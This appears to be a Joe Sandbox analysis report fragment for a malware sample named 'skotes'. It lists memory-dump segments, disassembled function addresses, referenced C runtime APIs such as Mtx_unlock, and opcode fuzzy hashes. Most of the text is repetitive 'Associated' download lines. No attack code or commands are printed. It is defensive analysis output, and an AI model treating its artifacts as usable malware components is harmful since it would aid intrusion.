Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situMtx_destroy_in_situ
String ID: d+~
API String ID: 1432671424-1901206460
Opcode ID: 7076c794e1aa01e9758eb36ed0c386c6b721f015fdca11212af120bacc0a4831
Instruction ID: 6cd9c05a20dc4d43793f01878657d8705a11b49fd7dbd1786d09c20131888e02
Opcode Fuzzy Hash: 7076c794e1aa01e9758eb36ed0c386c6b721f015fdca11212af120bacc0a4831
Instruction Fuzzy Hash: B931D4B1A14704DFDB24DFA8F845A5BB7E8EF14310F104A2EE945C3242E779EA54C7A1

Function 007BF35F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 007BF3A3

Strings

`'~, xrefs: 007BF375
8"~, xrefs: 007BF44B

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: ___free_lconv_mon
String ID: 8"~$`'~
API String ID: 3903695350-10081231
Opcode ID: 0b34aadf12cbb0d247cf52cf520ac0e4caec4f3d63730e3699f0dac047d62a06
Instruction ID: 57ce17a0b5eb027aa8e997ea0ce86c989c2f93aa9d63570e0661dc64cbfde434
Opcode Fuzzy Hash: 0b34aadf12cbb0d247cf52cf520ac0e4caec4f3d63730e3699f0dac047d62a06
Instruction Fuzzy Hash: 58313931600646EFEB21AA39DC49BDBB3E8EF00752F14442AE459D7599DF79AC80CB21

Function 0079A550 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 0079A5C1
__Mtx_unlock.LIBCPMT ref: 0079A60B

Strings

=L-t, xrefs: 0079A587

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock
String ID: =L-t
API String ID: 1418687624-768041998
Opcode ID: 4dcbad5002226d5850c2f0e1ad33a2c058398068767e4f05d8e997d07754e2d7
Instruction ID: 40e6f14e478878373a57d4835813eee183ccaecd68d173c972c52870e959d02c
Opcode Fuzzy Hash: 4dcbad5002226d5850c2f0e1ad33a2c058398068767e4f05d8e997d07754e2d7
Instruction Fuzzy Hash: 3F310CB1A01209EBDF10DF94ED46B5AF7B8FF04320F10826AE91997281DB79A910C7D2

Function 00799A80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00799B1A
Concurrency::cancel_current_task.LIBCPMT ref: 00799B60

Strings

=L-t, xrefs: 00799A94

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_taskMtx_unlock
String ID: =L-t
API String ID: 1170726187-768041998
Opcode ID: 6f8c80349cb9fedaf9d8ea3306c31ce47c81e8f469fb6f09ffbe79699d9e3acc
Instruction ID: e69713907395d3ece41db43e65819430144aba8e657758cff615c08117eddd35
Opcode Fuzzy Hash: 6f8c80349cb9fedaf9d8ea3306c31ce47c81e8f469fb6f09ffbe79699d9e3acc
Instruction Fuzzy Hash: A331E2B0D04249DBEF11DBA8E849BAFBBF8EF04700F10411DE505A3282D77CA904C7A1

Function 00783380 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON

Download Yara Rule

APIs

__Cnd_broadcast.LIBCPMT ref: 007833CB
__Mtx_unlock.LIBCPMT ref: 007833DF

Strings

=L-t, xrefs: 00783393

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Cnd_broadcastMtx_unlock
String ID: =L-t
API String ID: 3773178532-768041998
Opcode ID: 6050f021a77dff81e6c55252d3f650b1c166371f86af4fd51ad5fdf875df2aa9
Instruction ID: bdf262b0439cb2816bc9bc2674336b043f1359928434ce1584761c04597362d3
Opcode Fuzzy Hash: 6050f021a77dff81e6c55252d3f650b1c166371f86af4fd51ad5fdf875df2aa9
Instruction Fuzzy Hash: BF112771A44640EBDF21AB5DE905B9AB3ACEF55B30F00412AE80983641D73CDE0187D0

Function 0079B5D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 0079B65E

Strings

csm, xrefs: 0079B612
=L-t, xrefs: 0079B5DC

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: __alloca_probe_16
String ID: =L-t$csm
API String ID: 1700504859-3787756838
Opcode ID: 65e392adc00a4003604b21494927f658e60fba6a4cbf0905c64ce3c4e3f6bb45
Instruction ID: 98af7d64fda66ddc4d644a8ac74c79521842038b4cee38831818b2226c25d840
Opcode Fuzzy Hash: 65e392adc00a4003604b21494927f658e60fba6a4cbf0905c64ce3c4e3f6bb45
Instruction Fuzzy Hash: 2D21A932D01218EBCF24DFA9FA85AAEB7B9EF04710F544409E805AB250CB38BD45CB91

Function 007B1704 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 007B1764
std::invalid_argument::invalid_argument.LIBCONCRT ref: 007B17AF

Strings

pContext, xrefs: 007B17A7

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
